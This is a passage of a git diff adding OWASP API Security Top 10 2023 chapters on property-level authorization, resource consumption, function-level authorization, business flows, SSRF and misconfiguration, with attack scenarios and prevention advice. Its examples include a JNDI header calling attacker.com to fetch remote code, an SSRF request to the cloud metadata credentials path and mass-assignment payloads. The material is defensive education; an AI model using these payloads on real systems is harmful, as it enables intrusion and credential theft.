+[4]: https://cheatsheetseries.owasp.org/cheatsheets/Key_Management_Cheat_Sheet.html
+[5]: https://owasp.org/www-community/attacks/Credential_stuffing
+[6]: https://cwe.mitre.org/data/definitions/204.html
+[7]: https://cwe.mitre.org/data/definitions/307.html
diff --git a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md
new file mode 100644
index 000000000..172e75d3b
--- /dev/null
+++ b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md
@@ -0,0 +1,151 @@
+# API3:2023 Broken Object Property Level Authorization
+
+| Threat agents/Attack vectors | Security Weakness | Impacts |
+| - | - | - |
+| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Easy** | Technical **Moderate** : Business Specific |
+| APIs tend to expose endpoints that return all object’s properties. This is particularly valid for REST APIs. For other protocols such as GraphQL, it may require crafted requests to specify which properties should be returned. Identifying these additional properties that can be manipulated requires more effort, but there are a few automated tools available to assist in this task. | Inspecting API responses is enough to identify sensitive information in returned objects’ representations. Fuzzing is usually used to identify additional (hidden) properties. Whether they can be changed is a matter of crafting an API request and analyzing the response. Side-effect analysis may be required if the target property is not returned in the API response. | Unauthorized access to private/sensitive object properties may result in data disclosure, data loss, or data corruption. Under certain circumstances, unauthorized access to object properties can lead to privilege escalation or partial/full account takeover. |
+
+## Is the API Vulnerable?
+
+When allowing a user to access an object using an API endpoint, it is important
+to validate that the user has access to the specific object properties they are
+trying to access.
+
+An API endpoint is vulnerable if:
+
+* The API endpoint exposes properties of an object that are considered
+  sensitive and should not be read by the user. (previously named: "[Excessive
+  Data Exposure][1]")
+* The API endpoint allows a user to change, add/or delete the value of a
+  sensitive object's property which the user should not be able to access
+  (previously named: "[Mass Assignment][2]")
+
+## Example Attack Scenarios
+
+### Scenario #1
+
+A dating app allows a user to report other users for inappropriate behavior.
+As part of this flow, the user clicks on a "report" button, and the following
+API call is triggered:
+
+```
+POST /graphql
+{
+  "operationName":"reportUser",
+  "variables":{
+    "userId": 313,
+    "reason":["offensive behavior"]
+  },
+  "query":"mutation reportUser($userId: ID!, $reason: String!) {
+    reportUser(userId: $userId, reason: $reason) {
+      status
+      message
+      reportedUser {
+        id
+        fullName
+        recentLocation
+      }
+    }
+  }"
+}
+```
+
+The API Endpoint is vulnerable since it allows the authenticated user to have
+access to sensitive (reported) user object properties, such as "fullName" and
+"recentLocation" that are not supposed to be accessed by other users.
+
+### Scenario #2
+
+An online marketplace platform, that offers one type of users ("hosts") to rent
+out their apartment to another type of users ("guests"), requires the host to
+accept a booking made by a guest, before charging the guest for the stay.
+
+As part of this flow, an API call is sent by the host to
+`POST /api/host/approve_booking` with the following legitimate payload:
+
+```
+{
+  "approved": true,
+  "comment": "Check-in is after 3pm"
+}
+```
+
+The host replays the legitimate request, and adds the following malicious
+payload:
+
+```
+{
+  "approved": true,
+  "comment": "Check-in is after 3pm",
+  "total_stay_price": "$1,000,000"
+}
+```
+
+The API endpoint is vulnerable because there is no validation that the host
+should have access to the internal object property - `total_stay_price`, and
+the guest will be charged more than she was supposed to be.
+
+### Scenario #3
+
+A social network that is based on short videos, enforces restrictive content
+filtering and censorship. Even if an uploaded video is blocked, the user can
+change the description of the video using the following API request:
+
+```
+PUT /api/video/update_video
+
+{
+  "description": "a funny video about cats"
+}
+```
+
+A frustrated user can replay the legitimate request, and add the following
+malicious payload:
+
+```
+{
+  "description": "a funny video about cats",
+  "blocked": false
+}
+```
+
+The API endpoint is vulnerable because there is no validation if the user
+should have access to the internal object property - `blocked`, and the user
+can change the value from `true` to `false` and unlock their own blocked
+content.
+
+## How To Prevent
+
+* When exposing an object using an API endpoint, always make sure that the user
+  should have access to the object's properties you expose.
+* Avoid using generic methods such as `to_json()` and `to_string()`. Instead,
+  cherry-pick specific object properties you specifically want to return.
+* If possible, avoid using functions that automatically bind a client's input
+  into code variables, internal objects, or object properties
+  ("Mass Assignment").
+* Allow changes only to the object's properties that should be updated by the
+  client.
+* Implement a schema-based response validation mechanism as an extra layer of
+  security. As part of this mechanism, define and enforce data returned by all
+  API methods.
+* Keep returned data structures to the bare minimum, according to the
+  business/functional requirements for the endpoint.
+
+## References
+
+### OWASP
+
+* [API3:2019 Excessive Data Exposure - OWASP API Security Top 10 2019][1]
+* [API6:2019 - Mass Assignment - OWASP API Security Top 10 2019][2]
+* [Mass Assignment Cheat Sheet][3]
+
+### External
+
+* [CWE-213: Exposure of Sensitive Information Due to Incompatible Policies][4]
+* [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes][5]
+
+[1]: https://owasp.org/API-Security/editions/2019/en/0xa3-excessive-data-exposure/
+[2]: https://owasp.org/API-Security/editions/2019/en/0xa6-mass-assignment/
+[3]: https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html
+[4]: https://cwe.mitre.org/data/definitions/213.html
+[5]: https://cwe.mitre.org/data/definitions/915.html
diff --git a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md
new file mode 100644
index 000000000..cf2862b03
--- /dev/null
+++ b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md
@@ -0,0 +1,173 @@
+# API4:2023 Unrestricted Resource Consumption
+
+| Threat agents/Attack vectors | Security Weakness | Impacts |
+| - | - | - |
+| API Specific : Exploitability **Average** | Prevalence **Widespread** : Detectability **Easy** | Technical **Severe** : Business Specific |
+| Exploitation requires simple API requests. Multiple concurrent requests can be performed from a single local computer or by using cloud computing resources. Most of the automated tools available are designed to cause DoS via high loads of traffic, impacting APIs’ service rate. | It's common to find APIs that do not limit client interactions or resource consumption. Crafted API requests, such as those including parameters that control the number of resources to be returned and performing response status/time/length analysis should allow identification of the issue. The same is valid for batched operations. Although threat agents don't have visibility over costs impact, this can be inferred based on service providers’ (e.g. cloud provider) business/pricing model. | Exploitation can lead to DoS due to resource starvation, but it can also lead to operational costs increase such as those related to the infrastructure due to higher CPU demand, increasing cloud storage needs, etc. |
+
+## Is the API Vulnerable?
+
+Satisfying API requests requires resources such as network bandwidth, CPU,
+memory, and storage. Sometimes required resources are made available by service
+providers via API integrations, and paid for per request, such as sending
+emails/SMS/phone calls, biometrics validation, etc.
+
+An API is vulnerable if at least one of the following limits is missing or set
+inappropriately (e.g. too low/high):
+
+* Execution timeouts
+* Maximum allocable memory
+* Maximum number of file descriptors
+* Maximum number of processes
+* Maximum upload file size
+* Number of operations to perform in a single API client request (e.g. GraphQL
+  batching)
+* Number of records per page to return in a single request-response
+* Third-party service providers' spending limit
+
+## Example Attack Scenarios
+
+### Scenario #1
+
+A social network implemented a “forgot password” flow using SMS verification,
+enabling the user to receive a one time token via SMS in order to reset their
+password.
+
+Once a user clicks on "forgot password" an API call is sent from the user's
+browser to the back-end API:
+
+```
+POST /initiate_forgot_password
+
+{
+  "step": 1,
+  "user_number": "6501113434"
+}
+```
+
+Then, behind the scenes, an API call is sent from the back-end to a 3rd party
+API that takes care of the SMS delivering:
+
+```
+POST /sms/send_reset_pass_code
+
+Host: willyo.net
+
+{
+  "phone_number": "6501113434"
+}
+```
+
+The 3rd party provider, Willyo, charges $0.05 per this type of call.
+
+An attacker writes a script that sends the first API call tens of thousands of
+times. The back-end follows and requests Willyo to send tens of thousands of
+text messages, leading the company to lose thousands of dollars in a matter of
+minutes.
+
+### Scenario #2
+
+A GraphQL API Endpoint allows the user to upload a profile picture.
+
+```
+POST /graphql
+
+{
+  "query": "mutation {
+    uploadPic(name: \"pic1\", base64_pic: \"R0FOIEFOR0xJVA…\") {
+      url
+    }
+  }"
+}
+```
+
+Once the upload is complete, the API generates multiple thumbnails with
+different sizes based on the uploaded picture. This graphical operation takes a
+lot of memory from the server.
+
+The API implements a traditional rate limiting protection - a user can't access
+the GraphQL endpoint too many times in a short period of time. The API also
+checks for the uploaded picture's size before generating thumbnails to avoid
+processing pictures that are too large.
+
+An attacker can easily bypass those mechanisms, by leveraging the flexible
+nature of GraphQL:
+
+```
+POST /graphql
+
+[
+  {"query": "mutation {uploadPic(name: \"pic1\", base64_pic: \"R0FOIEFOR0xJVA…\") {url}}"},
+  {"query": "mutation {uploadPic(name: \"pic2\", base64_pic: \"R0FOIEFOR0xJVA…\") {url}}"},
+  ...
+  {"query": "mutation {uploadPic(name: \"pic999\", base64_pic: \"R0FOIEFOR0xJVA…\") {url}}"},
+}
+```
+
+Because the API does not limit the number of times the `uploadPic` operation can
+be attempted, the call will lead to exhaustion of server memory and Denial of
+Service.
+
+### Scenario #3
+
+A service provider allows clients to download arbitrarily large files using its
+API. These files are stored in cloud object storage and they don't change that
+often. The service provider relies on a cache service to have a better service
+rate and to keep bandwidth consumption low. The cache service only caches files
+up to 15GB.
+
+When one of the files gets updated, its size increases to 18GB. All service
+clients immediately start pulling the new version. Because there were no
+consumption cost alerts, nor a maximum cost allowance for the cloud service,
+the next monthly bill increases from US$13, on average, to US$8k.
+
+## How To Prevent
+
+* Use a solution that makes it easy to limit [memory][1],
+  [CPU][2], [number of restarts][3], [file descriptors, and processes][4] such
+  as Containers / Serverless code (e.g. Lambdas).
+* Define and enforce a maximum size of data on all incoming parameters and
+  payloads, such as maximum length for strings, maximum number of elements in
+  arrays, and maximum upload file size (regardless of whether it is stored
+  locally or in cloud storage).
+* Implement a limit on how often a client can interact with the API within a
+  defined timeframe (rate limiting).
+* Rate limiting should be fine tuned based on the business needs. Some API
+  Endpoints might require stricter policies.
+* Limit/throttle how many times or how often a single API client/user can
+  execute a single operation (e.g. validate an OTP, or request password
+  recovery without visiting the one-time URL).
+* Add proper server-side validation for query string and request body
+  parameters, specifically the one that controls the number of records to be
+  returned in the response.
+* Configure spending limits for all service providers/API integrations. When
+  setting spending limits is not possible, billing alerts should be configured
+  instead.
+
+## References
+
+### OWASP
+
+* ["Availability" - Web Service Security Cheat Sheet][5]
+* ["DoS Prevention" - GraphQL Cheat Sheet][6]
+* ["Mitigating Batching Attacks" - GraphQL Cheat Sheet][7]
+
+### External
+
+* [CWE-770: Allocation of Resources Without Limits or Throttling][8]
+* [CWE-400: Uncontrolled Resource Consumption][9]
+* [CWE-799: Improper Control of Interaction Frequency][10]
+* "Rate Limiting (Throttling)" - [Security Strategies for Microservices-based
+  Application Systems][11], NIST
+
+[1]: https://docs.docker.com/config/containers/resource_constraints/#memory
+[2]: https://docs.docker.com/config/containers/resource_constraints/#cpu
+[3]: https://docs.docker.com/engine/reference/commandline/run/#restart
+[4]: https://docs.docker.com/engine/reference/commandline/run/#ulimit
+[5]: https://cheatsheetseries.owasp.org/cheatsheets/Web_Service_Security_Cheat_Sheet.html#availability
+[6]: https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html#dos-prevention
+[7]: https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html#mitigating-batching-attacks
+[8]: https://cwe.mitre.org/data/definitions/770.html
+[9]: https://cwe.mitre.org/data/definitions/400.html
+[10]: https://cwe.mitre.org/data/definitions/799.html
+[11]: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-204.pdf
diff --git a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md
new file mode 100644
index 000000000..0bb3f432d
--- /dev/null
+++ b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md
@@ -0,0 +1,100 @@
+# API5:2023 Broken Function Level Authorization
+
+| Threat agents/Attack vectors | Security Weakness | Impacts |
+| - | - | - |
+| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Easy** | Technical **Severe** : Business Specific |
+| Exploitation requires the attacker to send legitimate API calls to an API endpoint that they should not have access to as anonymous users or regular, non-privileged users. Exposed endpoints will be easily exploited. | Authorization checks for a function or resource are usually managed via configuration or code level. Implementing proper checks can be a confusing task since modern applications can contain many types of roles, groups, and complex user hierarchies (e.g. sub-users, or users with more than one role). It's easier to discover these flaws in APIs since APIs are more structured, and accessing different functions is more predictable. | Such flaws allow attackers to access unauthorized functionality. Administrative functions are key targets for this type of attack and may lead to data disclosure, data loss, or data corruption. Ultimately, it may lead to service disruption. |
+
+## Is the API Vulnerable?
+
+The best way to find broken function level authorization issues is to perform
+a deep analysis of the authorization mechanism while keeping in mind the user
+hierarchy, different roles or groups in the application, and asking the
+following questions:
+
+* Can a regular user access administrative endpoints?
+* Can a user perform sensitive actions (e.g. creation, modification, or
+  deletion ) that they should not have access to by simply changing the HTTP
+  method (e.g. from `GET` to `DELETE`)?
+* Can a user from group X access a function that should be exposed only to
+  users from group Y, by simply guessing the endpoint URL and parameters
+  (e.g. `/api/v1/users/export_all`)?
+
+Don't assume that an API endpoint is regular or administrative only based on
+the URL path.
+
+While developers might choose to expose most of the administrative endpoints
+under a specific relative path, like `/api/admins`, it's very common to find
+these administrative endpoints under other relative paths together with regular
+endpoints, like `/api/users`.
+
+## Example Attack Scenarios
+
+### Scenario #1
+
+During the registration process for an application that allows only invited
+users to join, the mobile application triggers an API call to
+`GET /api/invites/{invite_guid}`. The response contains a JSON with details
+about the invite, including the user's role and the user's email.
+
+An attacker duplicates the request and manipulates the HTTP method and endpoint
+to `POST /api/invites/new`. This endpoint should only be accessed by
+administrators using the admin console. The endpoint does not implement
+function level authorization checks.
+
+The attacker exploits the issue and sends a new invite with admin privileges:
+
+```
+POST /api/invites/new
+
+{
+  "email": "attacker@somehost.com",
+  "role":"admin"
+}
+```
+
+Later on, the attacker uses the maliciously crafted invite in order to create
+themselves an admin account and gain full access to the system.
+
+### Scenario #2
+
+An API contains an endpoint that should be exposed only to administrators -
+`GET /api/admin/v1/users/all`. This endpoint returns the details of all the
+users of the application and does not implement function level authorization
+checks. An attacker who learned the API structure takes an educated guess and
+manages to access this endpoint, which exposes sensitive details of the users
+of the application.
+
+## How To Prevent
+
+Your application should have a consistent and easy-to-analyze authorization
+module that is invoked from all your business functions. Frequently, such
+protection is provided by one or more components external to the application
+code.
+
+* The enforcement mechanism(s) should deny all access by default, requiring
+  explicit grants to specific roles for access to every function.
+* Review your API endpoints against function level authorization flaws, while
+  keeping in mind the business logic of the application and groups hierarchy.
+* Make sure that all of your administrative controllers inherit from an
+  administrative abstract controller that implements authorization checks
+  based on the user's group/role.
+* Make sure that administrative functions inside a regular controller implement
+  authorization checks based on the user's group and role.
+
+## References
+
+### OWASP
+
+* [Forced Browsing][1]
+* "A7: Missing Function Level Access Control", [OWASP Top 10 2013][2]
+* [Access Control][3]
+
+### External
+
+* [CWE-285: Improper Authorization][4]
+
+[1]: https://owasp.org/www-community/attacks/Forced_browsing
+[2]: https://github.com/OWASP/Top10/raw/master/2013/OWASP%20Top%2010%20-%202013.pdf
+[3]: https://owasp.org/www-community/Access_Control
+[4]: https://cwe.mitre.org/data/definitions/285.html
diff --git a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md
new file mode 100644
index 000000000..46956d1f4
--- /dev/null
+++ b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md
@@ -0,0 +1,107 @@
+# API6:2023 Unrestricted Access to Sensitive Business Flows
+
+| Threat agents/Attack vectors | Security Weakness | Impacts |
+| - | - | - |
+| API Specific : Exploitability **Easy** | Prevalence **Widespread** : Detectability **Average** | Technical **Moderate** : Business Specific |
+| Exploitation usually involves understanding the business model backed by the API, finding sensitive business flows, and automating access to these flows, causing harm to the business. | Lack of a holistic view of the API in order to fully support business requirements tends to contribute to the prevalence of this issue. Attackers manually identify what resources (e.g. endpoints) are involved in the target workflow and how they work together. If mitigation mechanisms are already in place, attackers need to find a way to bypass them. | In general technical impact is not expected. Exploitation might hurt the business in different ways, for example: prevent legitimate users from purchasing a product, or lead to inflation in the internal economy of a game. |
+
+## Is the API Vulnerable?
+
+When creating an API Endpoint, it is important to understand which business flow
+it exposes. Some business flows are more sensitive than others, in the sense
+that excessive access to them may harm the business.
+
+Common examples of sensitive business flows and risk of excessive access
+associated with them:
+
+* Purchasing a product flow - an attacker can buy all the stock of a high-demand
+  item at once and resell for a higher price (scalping)
+* Creating a comment/post flow - an attacker can spam the system
+* Making a reservation - an attacker can reserve all the available time slots
+  and prevent other users from using the system
+
+The risk of excessive access might change between industries and businesses.
+For example - creation of posts by a script might be considered as a risk of
+spam by one social network, but encouraged by another social network.
+
+An API Endpoint is vulnerable if it exposes a sensitive business flow, without
+appropriately restricting the access to it.
+
+## Example Attack Scenarios
+
+### Scenario #1
+
+A technology company announces they are going to release a new gaming console on
+Thanksgiving. The product has a very high demand and the stock is limited. An
+attacker writes code to automatically buy the new product and complete the
+transaction.
+
+On the release day, the attacker runs the code distributed across different IP
+addresses and locations. The API doesn't implement the appropriate protection
+and allows the attacker to buy the majority of the stock before other legitimate
+users.
+
+Later on, the attacker sells the product on another platform for a much higher
+price.
+
+### Scenario #2
+
+An airline company offers online ticket purchasing with no cancellation fee. A
+user with malicious intentions books 90% of the seats of a desired flight.
+
+A few days before the flight the malicious user canceled all the tickets at
+once, which forced the airline to discount the ticket prices in order to fill
+the flight.
+
+At this point, the user buys herself a single ticket that is much cheaper than
+the original one.
+
+### Scenario #3
+
+A ride-sharing app provides a referral program - users can invite their friends
+and gain credit for each friend who has joined the app. This credit can be later
+used as cash to book rides.
+
+An attacker exploits this flow by writing a script to automate the registration
+process, with each new user adding credit to the attacker's wallet.
+
+The attacker can later enjoy free rides or sell the accounts with excessive
+credits for cash.
+
+## How To Prevent
+
+The mitigation planning should be done in two layers:
+
+* Business - identify the business flows that might harm the business if they
+  are excessively used.
+* Engineering - choose the right protection mechanisms to mitigate the business
+  risk.
+
+  Some of the protection mechanisms are more simple while others are more
+  difficult to implement. The following methods are used to slow down automated
+  threats:
+
+  * Device fingerprinting: denying service to unexpected client devices (e.g
+    headless browsers) tends to make threat actors use more sophisticated
+    solutions, thus more costly for them
+  * Human detection: using either captcha or more advanced biometric solutions
+    (e.g. typing patterns)
+  * Non-human patterns: analyze the user flow to detect non-human patterns (e.g.
+    the user accessed the "add to cart" and "complete purchase" functions in
+    less than one second)
+  * Consider blocking IP addresses of Tor exit nodes and well-known proxies
+
+  Secure and limit access to APIs that are consumed directly by machines (such
+  as developer and B2B APIs). They tend to be an easy target for attackers
+  because they often don't implement all the required protection mechanisms.
+
+## References
+
+### OWASP
+
+* [OWASP Automated Threats to Web Applications][1]
+* [API10:2019 Insufficient Logging & Monitoring][2]
+
+[1]: https://owasp.org/www-project-automated-threats-to-web-applications/
+[2]: https://owasp.org/API-Security/editions/2019/en/0xaa-insufficient-logging-monitoring/
+
diff --git a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md
new file mode 100644
index 000000000..70bce4868
--- /dev/null
+++ b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md
@@ -0,0 +1,161 @@
+# API7:2023 Server Side Request Forgery
+
+| Threat agents/Attack vectors | Security Weakness | Impacts |
+| - | - | - |
+| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Easy** | Technical **Moderate** : Business Specific |
+| Exploitation requires the attacker to find an API endpoint that accesses a URI that’s provided by the client. In general, basic SSRF (when the response is returned to the attacker), is easier to exploit than Blind SSRF in which the attacker has no feedback on whether or not the attack was successful. | Modern concepts in application development encourage developers to access URIs provided by the client. Lack of or improper validation of such URIs are common issues. Regular API requests and response analysis will be required to detect the issue. When the response is not returned (Blind SSRF) detecting the vulnerability requires more effort and creativity. | Successful exploitation might lead to internal services enumeration (e.g. port scanning), information disclosure, bypassing firewalls, or other security mechanisms. In some cases, it can lead to DoS or the server being used as a proxy to hide malicious activities. |
+
+## Is the API Vulnerable?
+
+Server-Side Request Forgery (SSRF) flaws occur when an API is fetching a remote
+resource without validating the user-supplied URL. It enables an attacker to
+coerce the application to send a crafted request to an unexpected destination,
+even when protected by a firewall or a VPN.
+
+Modern concepts in application development make SSRF more common and more
+dangerous.
+
+More common - the following concepts encourage developers to access an external
+resource based on user input: Webhooks, file fetching from URLs, custom SSO,
+and URL previews.
+
+More dangerous - Modern technologies like cloud providers, Kubernetes, and
+Docker expose management and control channels over HTTP on predictable,
+well-known paths. Those channels are an easy target for an SSRF attack.
+
+It is also more challenging to limit outbound traffic from your application,
+because of the connected nature of modern applications.
+
+The SSRF risk can not always be completely eliminated. While choosing a
+protection mechanism, it is important to consider the business risks and needs.
+
+## Example Attack Scenarios
+
+### Scenario #1
+
+A social network allows users to upload profile pictures. The user can choose
+either to upload the image file from their machine, or provide the URL of the
+image. Choosing the second, will trigger the following API call:
+
+```
+POST /api/profile/upload_picture
+
+{
+ "picture_url": "http://example.com/profile_pic.jpg"
+}
+```
+
+An attacker can send a malicious URL and initiate port scanning within the
+internal network using the API Endpoint.
+
+```
+{
+ "picture_url": "localhost:8080"
+}
+```
+
+Based on the response time, the attacker can figure out whether the port is
+open or not.
+
+### Scenario #2
+
+A security product generates events when it detects anomalies in the network.
+Some teams prefer to review the events in a broader, more generic monitoring
+system, such as a SIEM (Security Information and Event Management). For this
+purpose, the product provides integration with other systems using webhooks.
+
+As part of a creation of a new webhook, a GraphQL mutation is sent with the URL
+of the SIEM API.
+
+```
+POST /graphql
+
+[
+ {
+ "variables": {},
+ "query": "mutation {
+ createNotificationChannel(input: {
+ channelName: \"ch_piney\",
+ notificationChannelConfig: {
+ customWebhookChannelConfigs: [
+ {
+ url: \"http://www.siem-system.com/create_new_event\",
+ send_test_req: true
+ }
+ ]
+ }
+ }){
+ channelId
+ }
+ }"
+ }
+]
+
+```
+
+During the creation process, the API back-end sends a test request to the
+provided webhook URL, and presents to the user the response.
+
+An attacker can leverage this flow, and make the API request a sensitive
+resource, such as an internal cloud metadata service that exposes credentials:
+
+```
+POST /graphql
+
+[
+ {
+ "variables": {},
+ "query": "mutation {
+ createNotificationChannel(input: {
+ channelName: \"ch_piney\",
+ notificationChannelConfig: {
+ customWebhookChannelConfigs: [
+ {
+ url: \"http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-default-ssm\",
+ send_test_req: true
+ }
+ ]
+ }
+ }) {
+ channelId
+ }
+ }
+ }
+]
+```
+
+Since the application shows the response from the test request, the attacker
+can view the credentials of the cloud environment.
+
+## How To Prevent
+
+* Isolate the resource fetching mechanism in your network: usually these
+ features are aimed to retrieve remote resources and not internal ones.
+* Whenever possible, use allow lists of:
+ * Remote origins users are expected to download resources from (e.g. Google
+ Drive, Gravatar, etc.)
+ * URL schemes and ports
+ * Accepted media types for a given functionality
+* Disable HTTP redirections.
+* Use a well-tested and maintained URL parser to avoid issues caused by URL
+ parsing inconsistencies.
+* Validate and sanitize all client-supplied input data.
+* Do not send raw responses to clients.
+
+## References
+
+### OWASP
+
+* [Server Side Request Forgery][1]
+* [Server-Side Request Forgery Prevention Cheat Sheet][2]
+
+### External
+
+* [CWE-918: Server-Side Request Forgery (SSRF)][3]
+* [URL confusion vulnerabilities in the wild: Exploring parser inconsistencies,
+ Snyk][4]
+
+[1]: https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
+[2]: https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
+[3]: https://cwe.mitre.org/data/definitions/918.html
+[4]: https://snyk.io/blog/url-confusion-vulnerabilities/
diff --git a/editions/2023/pt-pt/0xa8-security-misconfiguration.md b/editions/2023/pt-pt/0xa8-security-misconfiguration.md
new file mode 100644
index 000000000..c2dd4b98a
--- /dev/null
+++ b/editions/2023/pt-pt/0xa8-security-misconfiguration.md
@@ -0,0 +1,130 @@
+# API8:2023 Security Misconfiguration
+
+| Threat agents/Attack vectors | Security Weakness | Impacts |
+| - | - | - |
+| API Specific : Exploitability **Easy** | Prevalence **Widespread** : Detectability **Easy** | Technical **Severe** : Business Specific |
+| Attackers will often attempt to find unpatched flaws, common endpoints, services running with insecure default configurations, or unprotected files and directories to gain unauthorized access or knowledge of the system. Most of this is public knowledge and exploits may be available. | Security misconfiguration can happen at any level of the API stack, from the network level to the application level. Automated tools are available to detect and exploit misconfigurations such as unnecessary services or legacy options. | Security misconfigurations not only expose sensitive user data, but also system details that can lead to full server compromise. |
+
+## Is the API Vulnerable?
+
+The API might be vulnerable if:
+
+* Appropriate security hardening is missing across any part of the API stack,
+ or if there are improperly configured permissions on cloud services
+* The latest security patches are missing, or the systems are out of date
+* Unnecessary features are enabled (e.g. HTTP verbs, logging features)
+* There are discrepancies in the way incoming requests are processed by servers
+ in the HTTP server chain
+* Transport Layer Security (TLS) is missing
+* Security or cache control directives are not sent to clients
+* A Cross-Origin Resource Sharing (CORS) policy is missing or improperly set
+* Error messages include stack traces, or expose other sensitive information
+
+## Example Attack Scenarios
+
+### Scenario #1
+
+An API back-end server maintains an access log written by a popular third-party
+open-source logging utility with support for placeholder expansion and JNDI
+(Java Naming and Directory Interface) lookups, both enabled by default. For
+each request, a new entry is written to the log file with the following
+pattern: ` / - `.
+
+A bad actor issues the following API request, which gets written to the access
+log file:
+
+```
+GET /health
+X-Api-Version: ${jndi:ldap://attacker.com/Malicious.class}
+```
+
+Due to the insecure default configuration of the logging utility and a
+permissive network outbound policy, in order to write the corresponding entry
+to the access log, while expanding the value in the `X-Api-Version` request
+header, the logging utility will pull and execute the `Malicious.class` object
+from the attacker's remote controlled server.
+
+### Scenario #2
+
+A social network website offers a "Direct Message" feature that allows users to
+keep private conversations. To retrieve new messages for a specific
+conversation, the website issues the following API request (user interaction is
+not required):
+
+```
+GET /dm/user_updates.json?conversation_id=1234567&cursor=GRlFp7LCUAAAA
+```
+
+Because the API response does not include the `Cache-Control` HTTP response
+header, private conversations end-up cached by the web browser, allowing
+malicious actors to retrieve them from the browser cache files in the
+filesystem.
+
+## How To Prevent
+
+The API life cycle should include:
+
+* A repeatable hardening process leading to fast and easy deployment of a
+ properly locked down environment
+* A task to review and update configurations across the entire API stack. The
+ review should include: orchestration files, API components, and cloud
+ services (e.g. S3 bucket permissions)
+* An automated process to continuously assess the effectiveness of the
+ configuration and settings in all environments
+
+Furthermore:
+
+* Ensure that all API communications from the client to the API server and any
+ downstream/upstream components happen over an encrypted communication channel
+ (TLS), regardless of whether it is an internal or public-facing API.
+* Be specific about which HTTP verbs each API can be accessed by: all other
+ HTTP verbs should be disabled (e.g. HEAD).
+* APIs expecting to be accessed from browser-based clients (e.g., WebApp
+ front-end) should, at least:
+ * implement a proper Cross-Origin Resource Sharing (CORS) policy
+ * include applicable Security Headers
+* Restrict incoming content types/data formats to those that meet the business/
+ functional requirements.
+* Ensure all servers in the HTTP server chain (e.g. load balancers, reverse
+ and forward proxies, and back-end servers) process incoming requests in a
+ uniform manner to avoid desync issues.
+* Where applicable, define and enforce all API response payload schemas,
+ including error responses, to prevent exception traces and other valuable
+ information from being sent back to attackers.
+
+## References
+
+### OWASP
+
+* [OWASP Secure Headers Project][1]
+* [Configuration and Deployment Management Testing - Web Security Testing
+ Guide][2]
+* [Testing for Error Handling - Web Security Testing Guide][3]
+* [Testing for Cross Site Request Forgery - Web Security Testing Guide][4]
+
+### External
+
+* [CWE-2: Environmental Security Flaws][5]
+* [CWE-16: Configuration][6]
+* [CWE-209: Generation of Error Message Containing Sensitive Information][7]
+* [CWE-319: Cleartext Transmission of Sensitive Information][8]
+* [CWE-388: Error Handling][9]
+* [CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response
+ Smuggling')][10]
+* [CWE-942: Permissive Cross-domain Policy with Untrusted Domains][11]
+* [Guide to General Server Security][12], NIST
+* [Let's Encrypt: a free, automated, and open Certificate Authority][13]
+
+[1]: https://owasp.org/www-project-secure-headers/
+[2]: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/README
+[3]: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/08-Testing_for_Error_Handling/README
+[4]: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery
+[5]: https://cwe.mitre.org/data/definitions/2.html
+[6]: https://cwe.mitre.org/data/definitions/16.html
+[7]: https://cwe.mitre.org/data/definitions/209.html
+[8]: https://cwe.mitre.org/data/definitions/319.html
+[9]: https://cwe.mitre.org/data/definitions/388.html
+[10]: https://cwe.mitre.org/data/definitions/444.html
+[11]: https://cwe.mitre.org/data/definitions/942.html
+[12]: https://csrc.nist.gov/publications/detail/sp/800-123/final
+[13]: https://letsencrypt.org/
diff --git a/editions/2023/pt-pt/0xa9-improper-inventory-management.md b/editions/2023/pt-pt/0xa9-improper-inventory-management.md
new file mode 100644
index 000000000..64458f478
--- /dev/null
+++ b/editions/2023/pt-pt/0xa9-improper-inventory-management.md
@@ -0,0 +1,105 @@
+# API9:2023 Improper Inventory Management
+
+| Threat agents/Attack vectors | Security Weakness | Impacts |
+| - | - | - |
+| API Specific : Exploitability **Easy** | Prevalence **Widespread** : Detectability **Average** | Technical **Moderate** : Business Specific |
